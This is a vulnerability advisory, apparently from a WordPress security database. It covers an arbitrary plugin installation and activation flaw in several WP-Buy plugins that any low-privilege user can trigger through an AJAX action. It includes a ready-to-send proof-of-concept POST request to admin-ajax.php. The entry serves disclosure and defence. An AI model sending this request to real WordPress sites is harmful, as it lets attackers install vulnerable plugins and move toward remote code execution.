Lucene search
BugbangWPEX-ID:74889E29-5349-43D1-BAF5-1622493BE90CHistoryApr 22, 2021 - 12:00 a.m.
Multiple WP-Buy Plugins - Arbitrary Plugin Installation/Activation via Low Privilege User
2021-04-2200:00:00
Bugbang
116
Low privileged users could use the AJAX action “cp_plugins_do_button_job_later_callback” from multiple plugins of the WP-Buy vendor, to install any plugin (including a specific version) from the WordPress repository, which helps attackers install vulnerable plugins and could lead to more critical vulnerabilities like RCE. Note (WPScanTeam): The same AJAX action could also be used to activate installed plugins on the blog.
Vulnerable code :
cp_plugins_do_button_job_later_callback() method in settings-start-index.php file
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Cookie: [Low Privilege User cookie]
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
action=do_button_job_later&slug=plugin_slug.version
To activate installed plugins, use the same request, but with the plugin_file instead of slug parameterRelated
wpvulndb
wpvulndb
prion
prion
Code injection
2021-05-14 12:15:00
Design/Logic Flaw
2021-05-14 12:15:00
Code injection
2021-05-14 12:15:00
cve
cve
patchstack
patchstack
Related for WPEX-ID:74889E29-5349-43D1-BAF5-1622493BE90C